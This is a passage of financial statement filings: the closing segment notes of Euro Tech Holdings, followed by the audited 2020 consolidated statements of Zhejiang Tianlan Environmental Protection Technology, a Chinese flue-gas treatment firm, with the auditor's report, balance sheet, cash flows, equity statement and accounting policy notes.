Long-lived assets represent property, plant and equipment, net.

(iv)
Major suppliers

Details of individual suppliers accounting for more than 5% of the Group’s purchases are as follows:

	Year ended December 31,
	2020	2019	2018

Supplier A	30%	53%	55%
Supplier B	12%	-	-
Supplier C	10%	7%	8%
Supplier D	9%	6%	7%
Supplier E	6%	6%	7%
Supplier F	5%	-	-

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

22
Segment information (Cont’d)

(v)
Major customers

Details of individual customers accounting for more than 5% of the Group’s revenue are as follows:

	Year ended December 31,
	2020	2019	2018

Customer A	9%	19%	15%
Customer B	8%	-	-
Customer C	6%	10%	-
Customer D	-	5%	-
Customer E	-	-	7%

23
Disaggregated revenue from contracts

	Year ended December 31,
	2020	2019	2018
	US$’000	US$’000	US$’000
Revenue
Trading and manufacturing (revenue recognized at point in time)	9,476	11,877	13,770
Engineering (revenue recognized over time)	3,881	5,522	6,334
	13,357	17,399	20,104

 24
Subsequent event

On February 11, 2021, the Company announced that the Company’s board of directors authorized the issuance of bonus shares (the “Bonus Shares”), which are issuable on March 2, 2021 to shareholders of record as of February 23, 2021 (the “Record Date”). Shareholders of record on the Record Date will receive two (2) ordinary shares for every three (3) ordinary shares held. All issuances resulting in a fractional share will be rounded down to the next whole share.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION
TECHNOLOGY COMPANY LIMITED

INDEX TO CONSOLIDATED FINANCIAL STATEMENTS

Page
Reports of Independent Registered Public Accounting Firm	F-45 to F-46
Consolidated Balance Sheets as of December 31, 2020 and 2019	F-47
Consolidated Statements of Operations for the years ended December 31, 2020, 2019 and 2018	F-48
Consolidated Statements of Cash Flows for the years ended December 31, 2020, 2019 and 2018	F-49
Consolidated Statements of Shareholders’ Equity for the years ended December 31, 2020, 2019 and 2018	F-50
Notes to the Consolidated Financial Statements	F-51 to F-72

Report of Independent Registered Public Accounting Firm

To the Board of Directors and Shareholders of
Zhejiang Tianlan Environmental Protection Technology Company Limited

Opinion on the Consolidated Financial Statements

We have audited the accompanying consolidated balance sheets of Zhejiang Tianlan Environmental Protection Technology Company Limited (the “Company”) and its subsidiaries (collectively referred to as the “Group”) as of December 31, 2020 and 2019, the related consolidated statements of operations, shareholders’ equity and cash flows for the year ended December 31, 2020, and the related notes (collectively referred to as the “consolidated financial statements”). In our opinion, the consolidated financial statements present fairly, in all material respects, the consolidated financial position of the Group as of December 31, 2020 and 2019, and the results of its consolidated operations and its consolidated cash flows for each of the three years ended December 31, 2020, in conformity with accounting principles generally accepted in the United States of America.

Basis for Opinion

These consolidated financial statements are the responsibility of the Group’s management. Our responsibility is to express an opinion on the Group’s consolidated financial statements based on our audits. We are a public accounting firm registered with the Public Company Accounting Oversight Board (United States) (“PCAOB”) and are required to be independent with respect to the Group in accordance with the U.S. federal securities laws and the applicable rules and regulations of the Securities and Exchange Commission and the PCAOB.

We conducted our audits in accordance with the standards of the PCAOB.  Those standards require that we plan and perform the audit to obtain reasonable assurance about whether the consolidated financial statements are free of material misstatement, whether due to error or fraud. The Group is not required to have, nor were we engaged to perform, an audit of its internal control over financial reporting. As part of our audits, we are required to obtain an understanding of internal control over financial reporting, but not for the purpose of expressing an opinion on the effectiveness of the Group’s internal control over financial reporting. Accordingly, we express no such opinion.

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

Critical Audit Matter

The critical audit matter communicated below is a matter arising from the current period audit of the consolidated financial statements that was communicated or required to be communicated to the management and that: (1) relates to accounts or disclosures that are material to the consolidated financial statements and (2) involved our especially challenging, subjective, or complex judgments. The communication of critical audit matters does not alter in any way our opinion on the consolidated financial statements, taken as a whole, and we are not, by communicating the critical audit matter below, providing a separate opinion on the critical audit matter or on the accounts or disclosures to which it relates.

Report of Independent Registered Public Accounting Firm (Cont’d)

To the Board of Directors and Shareholders of
Zhejiang Tianlan Environmental Protection Technology Company Limited

Critical Audit Matter (Cont’d)

Revenue Recognition

As described further in Note 2 to the consolidated financial statements, revenues derived from long-term contracts are recognized as the performance obligations are satisfied over time. The Group uses a ratio of project costs incurred to estimated total costs for each contract to recognize revenue. Under the cost-to-cost approach, the determination of the progress towards completion requires management to prepare estimates of the costs to complete. In addition, the Group’s contracts may include variable consideration related to contract modifications through change orders or claims, and management must also estimate the variable consideration the Group expects to receive in order to estimate the total contract revenue. We identified revenue recognized over time to be a critical audit matter.

The principal considerations for our determination that revenue recognized over time is a critical audit matter is that auditing management’s estimate of the progress toward completion of its projects was complex and subjective. This is due to the considerable judgement required to evaluate management’s determination of the forecasted costs to complete its long-term contracts as future results may vary significantly from past estimates due to changes in facts and circumstances. In addition, auditing the Group’s measurement of variable consideration is also complex and highly judgmental and can have a material effect on the amount of revenue recognized.

Our audit procedures related to revenue recognized over time included the following, among others.

●
We obtained an understanding, evaluated the design of the operating effectiveness of the Group’s processes and controls related to contract revenue recognition;
●
We tested the Group’s cost-to-cost estimates by evaluating the appropriate application of the cost-to-cost method, testing the significant assumptions used to develop the estimated cost to complete and testing the completeness and accuracy of the underlying data;
●
We tested the estimated variable consideration by evaluating the appropriate application of the most likely amount method, and tracing amounts to supporting documentation;
●
 We evaluating management’s ability to reasonably estimate costs by performing a comparison of the actual costs to prior period estimates, including evaluating the timely identification of circumstances that may warrant a modification to the estimated costs;
●
We evaluate management’s methodologies and the consistency of management’s methodologies over the life of the contracts;
●
We tested the original estimated costs and profit margins on projects that were commenced and completed during the year ended December 31, 2020, by obtaining the original estimates, compare to the actual costs and profit margin for the completed contracts and investigate significant changes; and
●
We tested the estimated costs to complete projects that were not completed during the year ended December 31, 2020 by comparing the estimated cost to complete at December 31, 2020 to actual cost incurred subsequent to December 31, 2020.

s/ Union Power HK CPA Limited

We have served as the Company’s auditor since 2018.

Hong Kong, the People’s Republic of China
May 13, 2021

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

CONSOLIDATED BALANCE SHEETS

	December 31,
	2020	2019
	RMB’000	RMB’000
Assets
Current assets:
Cash	50,969	11,614
Accounts receivable, net	118,621	138,778
Prepayments and other current assets	28,387	52,859
Contract assets, net	94,494	80,961
Inventories	2,389	5,755
Short-term investments	-	800

Total current assets	294,860	290,767

Property, plant and equipment, net	79,257	87,781
Intangible assets, net	2,120	927
Land use right, net	5,147	5,291
Deferred tax assets	13,639	13,970
Long-term investments	-	1,492

Total non-current assets	100,163	109,461

Total assets	395,023	400,228

Liabilities and shareholders’ equity
Current liabilities:
Bank borrowings	20,029	26,841
Accounts payable	97,795	89,372
Other payables and accrued expenses	17,747	7,583
Contract liabilities	47,135	55,898
Other taxes payable	15,169	9,531
Current portion of long-term finance lease obligations	-	25,785

Total current liabilities	197,875	215,010

Deferred government grant	4,894	2,349

Total non-current liabilities	4,894	2,349

Total liabilities	202,769	217,359

Commitments and contingencies (Note 21)

Shareholders’ equity:
Share capital 82,572,000 no par value shares authorised, issued and outstanding, as of December 31, 2020 and 2019, respectively	82,572	82,572
Capital reserve	35,761	35,510
PRC statutory reserve	15,670	14,421
Retained earnings	55,248	46,423

Total shareholders’ equity attributable to Zhejiang Tianlan Environmental Protection Technology Company Limited	189,251	178,926
Non-controlling interests	3,003	3,943

Total shareholders’ equity	192,254	182,869

Total liabilities and shareholders’ equity	395,023	400,228

The accompanying notes form an integral part of these consolidated financial statements.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

CONSOLIDATED STATEMENTS OF OPERATIONS

	Year ended December 31,
	2020	2019	2018
	RMB’000	RMB’000	RMB’000

Revenues	304,710	277,581	330,244

Cost of revenues	(261,478)	(227,632)	(274,062)

Gross profit	43,232	49,949	56,182

Selling and administrative expenses	(60,393)	(43,739)	(48,546)

Operating (loss) / income	(17,161)	6,210	7,636

Interest income	30	50	53
Interest expense	(1,676)	(2,258)	(2,998)
Other income	39,646	6,276	8,561
Other losses	(5,481)	(5,624)	(47,446)

Net income / (loss) before income tax	15,358	4,654	(34,194)

Income tax (expense) / credit	(1,858)	(296)	7,967

Net income / (loss)	13,500	4,358	(26,227)
Net loss / (income) attributable to non-controlling interests	2,032	484	(419)
Net income / (loss) attributable to Zhejiang Tianlan Environmental Protection Technology Company Limited’s shareholders	15,532	4,842	(26,646)

Net income / (loss) per ordinary share attributable to Zhejiang Tianlan Environmental Protection Technology Company Limited’s shareholders	RMB 0.19	RMB 0.06	(RMB 0.32)

Weighted average ordinary shares outstanding	82,572,000	82,572,000	82,572,000

The accompanying notes form an integral part of these consolidated financial statements.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

CONSOLIDATED STATEMENTS OF CASH FLOWS

	Year ended December 31,
	2020	2019	2018
	RMB’000	RMB’000	RMB’000
Cash flows from operating activities:
Net income/(loss)	13,500	4,358	(26,227)
Adjustments to reconcile net income/(loss) to net cash provided by operating activities:
Amortization of intangible assets	142	152	152
Amortization of land use right	159	149	149
Bad debts written off	-	5,383	13,946
Depreciation	6,359	6,556	11,755
Gain on disposal of property, plant and equipment	-	(39)	-
Impairment loss on contract assets	1,399	-	-
Impairment loss on long-term investments	1,340	-	-
Impairment loss on property, plant and equipment	2,742	-	33,500
Increase in allowance for doubtful accounts	-	2,437	-
Investment loss	-	241	-
Proceeds from deferred government grant	-	2,349	-
Property, plant and equipment written off	-	14	6
Reversal of allowance for doubtful accounts	(6,463)	-	-
Change in non-current assets and liabilities:
Deferred government grant	2,545	-	-
Deferred tax assets	331	268	(7,969)
Decrease / (increase) in current assets:
Accounts receivable, net	26,620	11,432	12,987
Prepayments and other current assets	24,472	(6,369)	1,403
Contract assets, net	(14,932)	20,033	18,262
Inventories	3,366	6,208	3,154
Short-term investments	800	-	-
Increase/(decrease) in current liabilities:
Accounts payable	8,423	(17,272)	(20,785)
Other payables and accrued expenses	10,164	(8,795)	(3,295)
Contract liabilities	(8,763)	14,852	(11,731)
Other taxes payable	5,638	(1,577)	22
Current portion of long-term finance lease obligations	(11,263)	-	-
Tax paid	(9,223)	(4,299)	(8,796)

Net cash provided by operating activities	57,356	36,081	16,533

Cash flows from investing activities:
Proceeds from investment	295	-	-
Proceeds from sale of long-term investments	-	-	133
Proceeds from sale of partial shareholding in a subsidiary	137	510	-
Proceeds from sale of property, plant and equipment	-	50	121
Proceeds from sale of subsidiaries	-	-	7,717
Purchase of intangible assets	(1,350)	-	(8)
Purchase of long-term investments	-	-	(111)
Purchase of property, plant and equipment	(577)	(1,584)	(913)
Purchase of short-term investments	-	(800)	-
Purchase of subsidiary	(5,100)	-	-

Net cash (used in)/provided by investing activities	(6,595)	(1,824)	6,939

Cash flows from financing activities:
Repayments of bank borrowings	(36,800)	(63,000)	(53,000)
Payment of principal obligations under long-term finance lease	-	(29,668)	(28,615)
Proceeds from bank borrowings	30,000	44,841	65,000
Proceeds from issuance of shares	-	-	2,450
Dividend paid to shareholders and interest paid	(4,606)	-	(9,908)

Net cash used in financing activities	(11,406)	(47,827)	(24,073)

Net increase/(decrease) in cash and cash equivalents	39,355	(13,570)	(601)

Cash and cash equivalents at beginning of year	11,614	25,184	25,785

Cash and cash equivalents at end of year	50,969	11,614	25,184

	RMB’000	RMB’000	RMB’000
Supplemental disclosure of consolidated cash flow information:

Cash paid during the period for income tax	-	5,237	8,796
Cash paid during the period for interest	1,716	2,258	2,924
Finance leases (disclosed in accompanying Note 3)

The accompanying notes form an integral part of these consolidated financial statements.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

CONSOLIDATED STATEMENTS OF SHAREHOLDERS’ EQUITY

	ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED’S SHAREHOLDERS
	Share capital	Capital reserve	PRC statutory reserve	Retained earnings	Non-controlling interests	Total
	RMB’000	RMB’000	RMB’000	RMB’000	RMB’000	RMB’000

Balance at December 31, 2017	82,572	32,480	14,122	79,646	2,494	211,314
Net income / (loss)	-	-	-	(26,646)	419	(26,227)
Dividend paid	-	-	-	(9,908)	-	(9,908)
Capitalization of gain on disposal of subsidiaries to the shareholders	-	1,874	-	-	(1,501)	373
Appropriation of reserves	-	1,212	(219)	(993)	-	-
Issuance of share	-	-	-	-	2,450	2,450
Balance at December 31, 2018	82,572	35,566	13,903	42,099	3,862	178,002
Net income / (loss)	-	-	-	4,842	(484)	4,358
Appropriation of reserves	-	-	518	(518)	-	-
Others	-	(56)	-	-	565	509
Balance at December 31, 2019	82,572	35,510	14,421	46,423	3,943	182,869
Net income / (loss)	-	-	-	15,532	(2,032)	13,500
Dividend paid	-	-	-	(2,890)	-	(2,890)
Others	-	251	(436)	(3,968)	(269)	(4,422)
Appropriation of reserves	-	-	1,685	(1,685)	-	-
Consolidation of companies under common control	-	3,600	-	1,836	2,122	7,558
Ordinary shares injected by shareholders	-	-	-	-	(761)	(761)
Utilization of reserve	-	(3,600)	-	-	-	(3,600)
Balance at December 31, 2020	82,572	35,761	15,670	55,248	3,003	192,254

The accompanying notes form an integral part of these consolidated financial statements.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS

1
Organization and business

Zhejiang Tianlan Environmental Protection Technology Company Limited (the “Company”) was incorporated in Hangzhou City, Zhejiang Province, the People's Republic of China (“PRC”) on May 18, 2000. The Company is a limited liability company limited by shares with an operating period up to long term.

The Company provides a comprehensive service for design, general contract, equipment manufacturing, installation, testing and operation management of the treatment of waste gases emitted from various boilers and industrial furnaces of power plants, steel works and chemical plants since 2000.

The Company has listed its shares on the New Third Board in the PRC since November 17, 2015 and suspended trading from August 15, 2017 and resumed trading on February 2, 2018 and suspended trading from November 24, 2020 and resumed trading on January 6, 2021.

The Group’s principal subsidiaries at December 31, 2020 and 2019 are set out below.

Name of entity	Ownership interest held by the Group		Place of incorporation and principal place of operation	Principal activities
	2020	2019

Zhejiang Tianlan Environmental Protection Engineering Company Limited	100%*	-	PRC	Design, general contract, installation and operating management of environmental protection projects
Hangzhou Tianlan Environmental Protection Equipment Company Limited	51%	51%	PRC	Manufacturing and installation services of environmental protection equipment
Hangzhou Tianlan Pure Environmental Protection Technology Company Limited	38.25%	40.8%	PRC	Manufacturing of environmental protection equipment
Hangzhou Tiancan Environmental Technology Company Limited	80%	100%	PRC	Manufacturing of environmental protection equipment

* This company was acquired in August 2020.

The outbreak of COVID-19 worldwide and the various public health measures put in place in many countries to prevent the spread of COVID-19 have disrupted the overall business of the Group at different levels of time and regions in 2020. After the Chinese new year in February 2020, the Group’s domestic businesses were affected by the lock-down of various cities implemented in PRC, resulting in the forced suspension of some local operations until the gradual resumption of work beginning from late March to early April 2020. Management continues to evaluate the impact of the COVID-19 pandemic and has concluded that while it is reasonably possible that the virus could have a negative effect on the Group’s consolidated financial position, results of its operations, the specific impact is not readily determinable as of the date of these consolidated financial statements. The consolidated financial statements do not include any adjustments that might result from the outcome of this uncertainty.

2
Summary of significant accounting policies

(a)
Basis of presentation

The accompanying consolidated financial statements are presented in accordance with accounting principles generally accepted in the United States of America (“GAAP”).

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

 (d)
Revenue recognition

Our revenue is derived from long-term contracts for customers, as well as short-term contracts for customers. Accounting treatment for these contracts in accordance with Accounting Standards Update (“ASU”) 2014-09 (Accounting Standards Codification (“ASC”) Topic 606, Revenue from Contracts with Customers), is as follows:

Performance obligations satisfied over time (Design, installiation and operation management services)

Recognition of performance obligations

A performance obligation is a promise in a contract to transfer a distinct good or service to the customer, and is the unit of account in the new revenue standard. The contract transaction price is allocated to each distinct performance obligation and recognized as revenue when, or as, the performance obligation is satisfied. Engineering projects typically span between 12 to 36 months. The majority of our contracts have a single performance obligation as the promise to transfer the individual goods or services is not separately identifiable from other promises in the contracts and, therefore, not distinct. Some contracts have multiple performance obligations, most commonly due to the contract covering multiple phases of the project life cycle (design, installation and operation management services).

Revenues are recognized as our obligations are satisfied over time, using the ratio of project costs incurred to estimated total costs for each contract because of the continuous transfer of control to the customer as all of the work is performed at the customer’s site and, therefore, the customer controls the asset as it is being installed. This continuous transfer of control to the customer is further supported by clauses in the contract that allow the customer to unilaterally terminate the contract for convenience, pay the Group for costs incurred plus a reasonable profit and take control of any work in process. This cost-to-cost measure is used because management considers it to be the best available measure of progress on these contracts. Contract costs include all direct material, labor, subcontract and other costs.

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

Variable consideration

Contract modifications through change orders, claims and incentives are routine in the performance of the Group’s contracts to account for changes in the contract specifications or requirements. In most instances, contract modifications are not distinct from the existing contract due to the significant integration of services provided in the contract and are accounted for as a modification of the existing contract and performance obligation. Either the Group or its customers may initiate change orders, which may include changes in specifications or designs, manner of performance, facilities, equipment, materials, sites and period of completion of the work. Change orders that are unapproved as to both price and scope are evaluated as claims. The Group considers claims to be amounts in excess of approved contract prices that the Group seeks to collect from its customers or others for customer-caused delays, errors in specifications and designs, contract terminations, change orders that are either in dispute or are unapproved as to both scope and price, or other causes of unanticipated additional contract costs.

The Group estimates variable consideration for a performance obligation at the most likely amount to which the Group expects to be entitled (or the most likely amount the Group expects to incur in the case of liquidated damages), utilizing estimation methods that best predict the amount of consideration to which the Group will be entitled (or will incur in the case of liquidated damages). The Group includes variable consideration in the estimated transaction price to the extent it is probable that a significant reversal of cumulative revenue recognized will not occur or when the uncertainty associated with the variable consideration is resolved. The Group’s estimates of variable consideration and determination of whether to include estimated amounts in transaction price are based largely on an assessment of its anticipated performance and all information (historical, current and forecasted) that is reasonably available to the Group.

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

Performance obligations satisfied at a point-in-time (Sales of equipment)

Revenue for our sales contracts is recognized at a point in time. Sales are recognized when control of the products has transferred, being when the products are delivered to the customer. Delivery occurs when the products have been delivered to the point of receipt by customer.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

2
Summary of significant accounting policies (Cont’d)

(e)
Research and development costs

Research and development costs (“R&D” costs) are expensed as incurred. The R&D costs amounted to approximately RMB28,589,000, RMB19,018,000 and RMB14,363,000 for the years ended December 31, 2020, 2019 and 2018 respectively and were included in “Selling and administrative expenses” in the Group’s consolidated statements of operations.

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

The accounting guidance on accounting for uncertainty in income taxes also addresses derecognition, classification, interest and penalties on income taxes, and accounting in interim periods. The Group does not believe it has any uncertain tax positions through the periods ended December 31, 2020, 2019 and 2018 respectively which would have a material impact on the Group’s consolidated financial statements.

The Group files tax returns in the PRC. The tax returns for 2020, 2019 and 2018 are subject to examination by the PRC taxing authorities, commencing with the first year filed.

(g)
Cash and cash equivalents

Cash and cash equivalents consist of bank deposits with original maturities of three months or less, all of which are unrestricted as to withdrawal and uninsured. There were no cash equivalents as of December 31, 2020 and 2019.

(h)
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

(i)
Classification of contract assets, net and liabilities

For revenue recognized associated with its contracts with customers over time, for which the Group has an enforceable right to receive compensation. Many of our contracts contain specific provisions that determine when the Group can bill for its work performed under these contracts.

Any revenue earned on a contract that has not yet been billed to the customer is recorded as a contract asset on the Group’s consolidated balance sheets.

The Group’s consolidated balance sheets present contract liabilities that contain deferred revenue that represent any costs incurred on contracts in process for which revenue has not yet been recognized.

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

(k)
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

(m)
Impairment of long lived assets

Long-lived assets such as property, plant and equipment and intangible assets with finite lives are evaluated for impairment whenever events or changes in circumstances indicate that the carrying value of an asset may not be fully recoverable or that the useful life is shorter than the Group had originally estimated. When these events occur, the Group evaluates the impairment for the long-lived assets by comparing the carrying value of the assets to an estimate of future undiscounted cash flows expected to be generated from the use of the assets and their eventual disposition. If the sum of the expected future undiscounted cash flows is less than the carrying value of the assets, the Group recognizes an impairment loss based on the excess of the carrying value of the assets over the fair value of the assets. The impairment of long-lived assets amounted to approximately RMB2,742,000, RMB Nil and RMB33,500,000 for the years ended December 31, 2020, 2019 and 2018 respectively and were included in “Selling and administrative expenses” in the Group’s consolidated statements of operations.

(n)
Government grant income

Government grant income consists of receipt of funds to subsidize the investment cost of technical development in China. No present or future obligation arises from the receipt of such amount.

Government grants are recognized in the consolidated balance sheet initially when there is reasonable assurance that they will be received and that the Group will comply with the conditions attaching to them. Grants that compensate the Group for expenses incurred are recognized as income in the consolidated statement of operations on a systematic basis in the same periods in which the expenses are incurred. Grants that compensate the Group for the cost of an asset are deducted from the carrying amount of the asset and consequently are effectively recognized in the consolidated statements of operations over the useful life of the asset by way of reduced depreciation expenses.

(o)
Leases arrangements

The Group adopted ASU No. 2016-02, Leases (Topic 842). The Group leases certain equipment under finance leases. The economic substance of the leases is a financing transaction for acquisition of the equipment. Accordingly, the right-of-use assets for these leases are included on the Group’s consolidated balance sheets in property, plant and equipment, net of accumulated depreciation, amortization and impairment losses, with a corresponding amount recorded in current portion of long-term finance lease obligations. The finance lease assets are amortized over the life of the lease or, if shorter, the life of the leased asset, on a straight-line basis and included in depreciation expense. The financing component associated with finance lease obligations is included in interest expense. Generally, for the Group’s finance leases an implicit rate to calculate present value is provided in the lease agreement, however if a rate in not provided the Group determines this rate by estimating the Group’s incremental borrowing rate, utilizing the borrowing rates associated with the Group’s various debt instruments.

The Group determines if an arrangement is a lease at inception. Lease liabilities are the Group’s obligation to make lease payments arising from a lease and are measured on a discounted basis.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

2
Summary of significant accounting policies (Cont’d)

(p)
Share capital

Paid in capital refers to the registered capital paid up by the shareholders of the Company.

At December 31, 2020, there were 82,572,000 shares (2019: 82,572,000 shares) issued.

(q)
Use of estimates

The preparation of the accompanying consolidated financial statements in conformity with GAAP requires management to make estimates and judgments that affect the reported amounts of assets and liabilities, the disclosure of contingent assets and liabilities at the date of the consolidated financial statements and the reported amounts of revenues and expenses during the reporting period. Certain accounting estimates of the Group require a higher degree of judgment than others in their application. These include the recognition of revenue and earnings from contracts over time, contract assets, net and contract liabilities. Management continually evaluates all of its estimates and judgments based on available information and experience; however, actual results could differ from these estimates.

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

(t)
Warranties

The suppliers of the Group offer a standard one-year warranty to end customer of the Group. The Group only provides labour service to repair or replace parts. The Group does not maintain a general warranty reserve because historically labour costs for such repair or replacement have been de minimis.

(u)
Shipping and handling costs

Amounts billed to customers related to shipping and handling are classified as revenues, and the Group’s shipping and handling costs are included in cost of revenues.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

2
Summary of significant accounting policies (Cont’d)

(v)
Finance costs

Interest relating to loans repaid is expensed in the period the repayment occurs.

(w)
Concentrations

Financial instruments that potentially subject the Group to a concentration of credit risk consist principally of cash and cash equivalents and accounts receivable, net. The Group maintains substantially all of its cash and cash equivalent balances with large financial institutions which are believed to be high quality institutions.

The Group is subject to a concentration of risk because it derives a significant portion of its revenues from a few customers. The Group’s top five customers accounted for approximately 39%, 40%, and 31% of consolidated revenues for the years ended December 31, 2020, 2019 and 2018, respectively. For the years ended December 31, 2020, 2019 and 2018, one customer accounted for 16%, 17% and 14% of annual revenues, respectively.

The Group grants trade credit under contractual payment terms, generally without collateral, to its customers, which include high credit quality electric utilities, general contractors, owners and managers of industrial properties.

Consequently, the Group is subject to potential credit risk related to changes in business and economic factors. At December 31, 2020 and 2019, none of the Group’s customers individually exceeded 10.0% of accounts receivable. The Group believes the terms and conditions in its contracts, billing and collection policies are adequate to minimize the potential credit risk.

(x)
Statutory reserve

The Group is required to make appropriation to reserve, comprising the PRC statutory reserve, based on after-tax net income determined with generally accepted accounting principles of the PRC (“PRC GAAP”).

Appropriations to the PRC statutory reserve are required to be at least 10% of the after tax net income determined in accordance with PRC GAAP until the reserve is equal to 50% of the entities’ registered capital.

(y)
Fair value measurements

The Group uses the three-tier hierarchy of fair value measurement, which prioritizes the inputs used in measuring fair value based upon their degree of availability in external active markets. These tiers include: Level 1 (the highest priority), defined as observable inputs, such as quoted prices in active markets; Level 2, defined as inputs other than quoted prices in active markets that are either directly or indirectly observable; and Level 3 (the lowest priority), defined as unobservable inputs in which little or no market data exists, therefore requiring an entity to develop its own assumptions.

As of December 31, 2020 and 2019, the Group determined that the carrying values of cash, and cash equivalents, accounts receivable, net, prepayments and other current assets, contract assets, bank borrowings, accounts payable, other payables and accrued expenses and contract liabilities approximate their fair values because of the short-term nature of these instruments.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

2
Summary of significant accounting policies (Cont’d)

(z)
Short-term and long-term investments

The Group has elected to apply the measurement alternative to equity securities without readily determinable fair values. As such, the Group’s non-marketable equity securities are measured at cost, less any impairment, and are adjusted for changes in fair value resulting from observable transactions for identical or similar investments of the investee.

(aa)
Recent accounting pronouncements

Changes to GAAP are typically established by the Financial Accounting Standards Board (“FASB”) in the form of accounting standards updates (“ASUs”) to the FASB’s ASC. The Group considers the applicability and impact of all ASUs. The Group, based on its assessment, determined that any recently issued or proposed ASUs not listed below are either not applicable to the Group or may have minimal impact on its consolidated financial statements.

Recently adopted accounting pronouncements

In June 2016, the FASB issued ASU 2016-13, Financial Instruments-Credit Losses (Topic 326), Measurement of Credit Losses on Financial Instruments, which introduced an expected credit loss methodology for the measurement and recognition of credit losses on most financial instruments, including trade receivables and off-balance sheet credit exposures. Under this guidance, an entity is required to consider a broader range of information to estimate expected credit losses, which may result in earlier recognition of losses. This ASU also requires disclosure of information regarding how a company developed its allowance, including changes in the factors that influenced management’s estimate of expected credit losses and the reasons for those changes.

In August 2018, the FASB issued ASU 2018-13, Fair Value Measurement (Topic 820): Disclosure Framework-Changes to the Disclosure Requirements for Fair Value Measurement, which modifies the disclosure requirements for Level 1, Level 2 and Level 3 instruments in the fair value hierarchy. The Group adopted this ASU in January 2020 and there was no effect on the consolidated financial statements or disclosures.

Recently issued accounting pronouncements not yet adopted

In December 2019, the FASB issued ASU 2019-12, Simplifying the Accounting for Income Taxes, which simplifies the accounting for income taxes, eliminates certain exceptions within ASC 740, Income Taxes, and clarifies certain aspects of the current guidance to promote consistent application among reporting entities. The guidance is effective for fiscal years beginning after December 15, 2020, and interim periods within those fiscal years, with early adoption permitted. Upon adoption, the Group must apply certain aspects of this standard retrospectively for all periods presented while other aspects are applied on a modified retrospective basis through a cumulative-effect adjustment to retained earnings as of the beginning of the fiscal year of adoption. The adoption of this standard is not expected to have a material impact on the Group’s consolidated financial statements or disclosures.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

2
Summary of significant accounting policies (Cont’d)

(aa)
Recent accounting pronouncements (Cont’d)

Recently issued accounting pronouncements not yet adopted

In January 2020, the FASB issued ASU 2020-01, “Investments-Equity Securities (Topic 321), Investments-Equity Method and Joint Ventures (Topic 323), and Derivatives and Hedging (Topic 815),” an amendment clarifying the interaction between accounting standards related to equity securities, equity method investments, and certain derivative instruments. The guidance is effective for fiscal years beginning after December 15, 2020. ASU 2020-01 will become effective for the Group in fiscal 2022. The Group is currently evaluating the impact of the new guidance on its consolidated financial statements.

In October 2020, the FASB issued ASU 2020-10, “Codification Improvements,” this ASU affects a wide variety of Topics in the Codification. They apply to all reporting entities within the scope of the affected accounting guidance. More specifically, this ASU, among other things, contains amendments that improve the consistency of the Codification by including all disclosure guidance in the appropriate Disclosure Section (Section 50). Many of the amendments arose because the FASB provided an option to give certain information either on the face of the financial statements or in the notes to financial statements and that option only was included in the Other Presentation Matters Section (Section 45) of the Codification. The option to disclose information in the notes to financial statements should have been codified in the Disclosure Section as well as the Other Presentation Matters Section (or other Section of the Codification in which the option to disclose in the notes to financial statements appears). Those amendments are not expected to change current practice. The amendments are effective for annual periods beginning after December 15, 2021, and interim periods within annual periods beginning after December 15, 2022. Early application of the amendments is permitted for and varies based on the entity. The amendments should be applied retrospectively and at the beginning of the period that includes the adoption date. The Group is currently evaluating the impact of the new guidance on its consolidated financial statements.

(ab)
Non-controlling interests

For entities that are consolidated, but not 100% owned, a portion of the income or loss and equity is allocated to owners other than the Group. The aggregate of the income or loss and corresponding equity that is not owned by the Group is included within non-controlling interests in the consolidated financial statements.

Non-controlling interests is presented as a separate component of equity in the consolidated balance sheets. Net income includes the net income attributable to the holders of non-controlling interests in the consolidated statements of operations and comprehensive income / (loss). Profits and losses are allocated to non-controlling interests in proportion to their relative ownership interests regardless of their basis.

ZHEJIANG TIANLAN ENVIRONMENTAL PROTECTION TECHNOLOGY COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

3
Lease obligations

The Group has finance leases primarily for equipment.

The components of lease expense are as follows:

	Years ended December 31,
	2020	2019
	RMB’000	RMB’000

Finance lease cost:
Amortization of right-of-use assets	5,837	4,347
Interest on lease liabilities included under cost of revenue and selling and administrative expenses	1,244	2,214
Total finance lease cost	7,081	6,561

Supplemental consolidated cash flow information related to leases is as follows:

	Years ended December 31,
	2020	2019
	RMB’000	RMB’000

Cash paid for amounts included in the measurement of lease liabilities:

Finance cash flows from finance leases	11,263	29,668
Right-of-use assets obtained in exchange for lease obligations (noncash):
Finance leases	-	-

Supplemental consolidated balance sheet information related to leases is as follows:

	December 31,
	2020	2019
	RMB’000	RMB’000

Finance leases
Property, plant and equipment, at cost	-	121,208
Accumulated depreciation and impairment losses	-	(71,508)

Property, plant and equipment, net	-	49,700

Current maturities of long-term debt	-	25,785
Total finance lease liabilities	-	25,785

Weighted average remaining lease term
Finance leases	-	1 year

Weighted average discount rate
Finance leases	5.9%	5.9%

